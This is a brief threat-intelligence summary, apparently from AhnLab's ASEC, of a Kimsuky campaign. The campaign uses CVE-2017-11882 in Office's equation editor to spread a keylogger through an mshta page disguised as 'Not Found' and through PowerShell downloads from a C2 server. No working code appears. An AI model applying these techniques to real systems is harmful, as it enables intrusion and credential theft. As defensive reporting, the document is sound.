- AhnLab Security Intelligence Center (ASEC) has confirmed that the Kimsuky attack group has been distributing keylogger malware by exploiting a vulnerability (CVE-2017-11882) in the equation editor program EQNEDT32.EXE included in MS Office.
- The attackers exploited the vulnerability to distribute the keylogger malware by executing a malicious script-inserted page through the mshta process.
- The page accessed through mshta uses the filename “error.php” and appears to be inaccessible with the message “Not Found” (as shown in Figure 2), but the malicious script is executed.
- The main actions of the malware include receiving and executing additional malicious code from C2(Query=50) using PowerShell commands, and creating a desktop.ini.bak file under the UsersPublicPictures path.
https://asec.ahnlab.com/ko/66135/